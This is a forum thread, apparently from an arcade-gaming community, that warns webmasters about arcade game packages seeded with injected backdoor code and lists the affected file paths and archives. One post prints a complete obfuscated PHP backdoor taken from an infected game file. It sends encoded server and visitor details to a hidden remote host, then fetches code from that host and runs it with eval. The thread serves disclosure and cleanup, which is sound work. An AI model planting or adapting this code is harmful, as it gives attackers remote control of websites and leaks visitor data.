Arcade Games Security Advisory

[NickTheGreek]

Due to recent developments regarding Arcade Security we owe this information towards our members, quoting : invisionarcade.com

Effective immediately, there are no longer any game downloads allowed to any members or groups.

This has nothing to do with anything other than security, not this site's security, but the security of all those who download games and install them elsewhere on other sites.

I care about our community and that is the reason I am doing this. I'm sure our visitor count will fall, but that's not what is important.

Recently, a number of sites have been hacked. This is not a new occurance, but when it happens, the entire community has to ban together and try to find out who and do what's necessary.

I have found a number of game files infected with code not originally included in the game by the original game coder. I will not give any information about the code, other than to say it is there and anyone downloading an affected game will then have this game and hacker's code on their site. So, to not spread this code to others, I am not allowing any game downloads until the situation is resolved. All the games infected here will be cleaned and the code removed.

The host has tremendous capabilities to investigate IPs and this may also be referred as a criminal act and those found to be doing the bad deeds will be pursued and punished if/when possible to the full extent of the law by whatever means and resources I have, as well as by my hosting company.

I will update this thread if/whenever I have pertinent information that is of benefit to the community. This is not all about me or my sites, but the community at large.

EVERY WEBMASTER WHO EITHER OWNS OR ADMINISTRATES A WEBSITE, AND WHO HAS FTP ACCESS, SHOULD BE AWARE THAT THEY STAND A VERY GOOD CHANCE OF DISCOVERING THEIR SITE HAS CODE INFECTED GAMES AND THEY SHOULD MANUALLY CHECK GAMEDATE FOLDERS FOR THESE INFECTED FILES AND DELETE THEM.

THERE IS EVIDENCE THAT MANY GAMES CONTAIN EXPLOIT CODE AS FAR BACK AS 2011 OR EARLIER.

JUST A HEAD'S UP THAT THIS PROBLEM OF GAMES CONTAINING EXPLOITED FILES WITH CODE IS PROBABLY MORE FAR REACHING THAT FIRST IMAGINED.

..........................................................

HACKING IS ILLEGAL

I have contacted my host and have instructed them to pursue legal action and if they can not do so, I intend to:

1. Fill out a "Complaint Assistant" form with the Federal Trade Commission. The information provided will be added to a database for further investigation purposes.
2. File a complaint with the FBI and fill out the bureau's "Public Tips and Leads" form.
3. Report the hacking occurences to the Internet Crime Complaint Center (IC3)

I will also solicit other website owners who were hacked to join in this action, to put more weight and force into this action.

Hopefully with the clues, IP logs and other evidence, we can find and punish the person responsible.

This is one piece of evidence found in the infected files and there are plenty more clues that will lead to the person responsible.

CODE

arcade/gamedata/dottiesm/index.php
arcade/gamedata/dottiesm/dottiesm_hiscores.php
arcade/gamedata/abbasonamissionv32/52232.php
arcade/gamedata/ultimatepingibpro/ultimatepingibpro_hiscores.php
arcade/gamedata/ultimatepingibpro/index.php
arcade/gamedata/GyrustakeeDR/index.php
arcade/gamedata/chopperdodgesm/chopperdodgesm_hiscores.php
arcade/gamedata/chopperdodgesm/index.php
arcade/gamedata/eggrunsm/index.php
arcade/gamedata/eggrunsm/eggrunsm_hiscores.php
arcade/gamedata/elevation2sm/index.php
arcade/gamedata/elevation2sm/elevation2sm_hiscores.php
arcade/gamedata/StuntCrewAS3v2DR/level_BIG.xml
arcade/gamedata/fishyv32/191309.php
arcade/gamedata/balloondsm/index.php
arcade/gamedata/balloondsm/balloondsm_hiscores.php
arcade/gamedata/majorslantibpro/index.php
arcade/gamedata/majorslantibpro/majorslantibpro_hiscores.php
arcade/gamedata/blockadeblitzv32e/133957.php
arcade/gamedata/blockadeblitzv32e/101577.php
arcade/gamedata/homerunv32MICRO/102742.php
arcade/gamedata/homerunv32MICRO/149173.php
arcade/gamedata/amazingsheriffAS3v2Th/costumThunder_one.swf
arcade/gamedata/dragonhuntsm/index.php
arcade/gamedata/fieldgoalibpro/index.php
arcade/gamedata/fieldgoalibpro/fieldgoalibpro_hiscores.php
arcade/gamedata/booibpro/booibpro_hiscores.php
arcade/gamedata/booibpro/index.php
arcade/gamedata/DynastyStreetSsm/DynastyStreetSsm_hiscores.php
arcade/gamedata/DynastyStreetSsm/index.php
arcade/gamedata/yeti9sm/yeti9sm_hiscores.php
arcade/gamedata/yeti9sm/index.php
arcade/gamedata/elevation2/index.php
arcade/gamedata/pickies_v32/66349.php
arcade/gamedata/pickies_v32/173026.php
arcade/gamedata/boingggsm/index.php
arcade/gamedata/boingggsm/boingggsm_hiscores.php
arcade/gamedata/celepowerlsm/celepowerlsm_hiscores.php
arcade/gamedata/celepowerlsm/index.php
arcade/gamedata/42gamesGC/xml/index.php
arcade/gamedata/duncanmansm/index.php
arcade/gamedata/duncanmansm/duncanmansm_hiscores.php
arcade/gamedata/armadillosm/index.php
arcade/gamedata/crazyfrogdancesm/crazyfrogdancesm_hiscores.php
arcade/gamedata/crazyfrogdancesm/index.php
arcade/gamedata/conundrumibpro/conundrumibpro_hiscores.php
arcade/gamedata/conundrumibpro/index.php
arcade/gamedata/DynastyStreetTsm/DynastyStreetTsm_hiscores.php
arcade/gamedata/DynastyStreetTsm/index.php
arcade/gamedata/AmmunitionMissionsm/index.php
arcade/gamedata/AmmunitionMissionsm/AmmunitionMissionsm_hiscores.php
arcade/gamedata/dearthsm/index.php
arcade/gamedata/dearthsm/dearthsm_hiscores.php
arcade/gamedata/tetrixibpro/tetrixibpro_hiscores.php
arcade/gamedata/tetrixibpro/index.php
arcade/gamedata/shredderBH/index.php
arcade/gamedata/shredderBH/shredderBH_hiscores.php
arcade/gamedata/flashballv32/142122.php
arcade/gamedata/comicblastersm/index.php
arcade/gamedata/comicblastersm/comicblastersm_hiscores.php
arcade/gamedata/masterQuanMenoMahv32Th/42179.php
arcade/gamedata/masterQuanMenoMahv32Th/52197.php
arcade/gamedata/masterQuanMenoMahv32Th/157088.php
arcade/gamedata/andersenplatsm/andersenplatsm_hiscores.php
arcade/gamedata/andersenplatsm/index.php

[NickTheGreek]

i think the problem involves many more files and unless scaned with CXS ( ConfigServer Exploit Scanner, http://configserver.com/cp/cxs.html ) many more PHP files include base64 expressions ( still until obfuscated we have no clue on the code run by those )

This is a list i just got from twitterarcade.com with FIND / GREP :

CODE

./gamedata/boingggsm/boingggsm_hiscores.php
./gamedata/boingggsm/index.php
./gamedata/mjartifacts2v32Th/233574.php
./gamedata/mjartifacts2v32Th/41838.php
./gamedata/celepowerlsm/index.php
./gamedata/celepowerlsm/celepowerlsm_hiscores.php
./gamedata/booibpro/index.php
./gamedata/booibpro/booibpro_hiscores.php
./gamedata/heli3DR/index.php
./gamedata/hs100mdashsm/index.php
./gamedata/hs100mdashsm/hs100mdashsm_hiscores.php
./gamedata/fieldgoalibpro/index.php
./gamedata/fieldgoalibpro/fieldgoalibpro_hiscores.php
./gamedata/comicblastersm/index.php
./gamedata/comicblastersm/comicblastersm_hiscores.php
./gamedata/mightydeskwobblersm/mightydeskwobblersm_hiscores.php
./gamedata/mightydeskwobblersm/index.php
./gamedata/blockadeblitzv32e/133957.php
./gamedata/blockadeblitzv32e/101577.php
./gamedata/elevation2/index.php
./gamedata/tetris2ibpro/index.php
./gamedata/tetris2ibpro/tetris2ibpro_hiscores.php
./gamedata/abbasonamissionv32/52232.php
./gamedata/dottiesm/index.php
./gamedata/dottiesm/dottiesm_hiscores.php
./gamedata/throwitsm/index.php
./gamedata/fruitsmashv32Sparky/8261.php
./gamedata/JewelsJack_v32/144327.php
./gamedata/JewelsJack_v32/17376.php
./gamedata/bobcatThv32/56730.php
./gamedata/squishibpro/index.php
./gamedata/squishibpro/squishibpro_hiscores.php
./gamedata/catbaseball_amav32Sparky/114340.php
./gamedata/catbaseball_amav32Sparky/126010.php
./gamedata/tetrixibpro/index.php
./gamedata/tetrixibpro/tetrixibpro_hiscores.php
./gamedata/feGC/70022.php
./gamedata/fishyv32/191309.php
./gamedata/shredderBH/index.php
./gamedata/shredderBH/shredderBH_hiscores.php
./gamedata/catchoThv32/169529.php
./gamedata/FiveAcornsSte/216306.php
./gamedata/FiveAcornsSte/37973.php
./gamedata/sequenceribpro/index.php
./gamedata/sequenceribpro/sequenceribpro_hiscores.php
./gamedata/homerunv32MICRO/102742.php
./gamedata/homerunv32MICRO/149173.php
./gamedata/flashstrikev32/138340.php
./gamedata/cavemanrunThv32/171360.php
./gamedata/cavemanrunThv32/229675.php
./gamedata/dragonhuntsm/index.php
./gamedata/elevation2sm/index.php
./gamedata/elevation2sm/elevation2sm_hiscores.php
./gamedata/toxicblastersm/toxicblastersm_hiscores.php
./gamedata/toxicblastersm/index.php
./gamedata/GyrustakeeDR/index.php
./gamedata/armadillosm/index.php
./gamedata/climacool2v32/93416.php
./gamedata/collapseshy/159172.php
./gamedata/masterQuanMenoMahv32Th/42179.php
./gamedata/masterQuanMenoMahv32Th/157088.php
./gamedata/masterQuanMenoMahv32Th/52197.php
./gamedata/42gamesGC/xml/index.php
./gamedata/actionfishv32/25104.php
./gamedata/actionfishv32/177400.php
./gamedata/lettersgamesm/index.php
./gamedata/balloondsm/index.php
./gamedata/balloondsm/balloondsm_hiscores.php
./gamedata/AmmunitionMissionsm/index.php
./gamedata/AmmunitionMissionsm/AmmunitionMissionsm_hiscores.php
./gamedata/pepperwater3sm/index.php
./gamedata/pepperwater4sm/index.php
./gamedata/airdodgev32/180179.php
./gamedata/flashballv32/142122.php
./gamedata/CaptainBradysReturnToTheBigTop_v32/130732.php
./gamedata/pickies_v32/173026.php
./gamedata/pickies_v32/66349.php

if anyone has SSH access i would be glad to share the search command so you can search your own arcade folder

upon opening ./gamedata/JewelsJack_v32/17376.php

CODE

<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:        
$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);    
$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);    
$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:            
$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".
base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".
".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cGhwc2VhcmNoLmNu");
if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="13f500a36523cbe752d73b867464e204")
$f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2FkczEu").$f.$z)));else
if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);}; ?>

and this is getting too popular:

CODE

http://www.boonex.com/n/Any_ideas_about_this_hack_in_6_1_4_

[NickTheGreek]

Potentially Harmful TAR files ( will be checked extensively )

game_andersenplatsm.tar
game_ultimatepingibpro.tar
game_slidermaniaibpro.tar
game_AmmunitionMissionsm.tar
game_AmmunitionMission2sm.tar
game_chopperdodgesm.tar
game_fieldgoalibpro.tar
game_socceribpro.tar
game_majorslantibpro.tar
game_jigsawmonkeyibpro.tar
game_sequenceribpro.tar
game_rotobosm.tar
game_conundrumibpro.tar
game_celepowerlsm.tar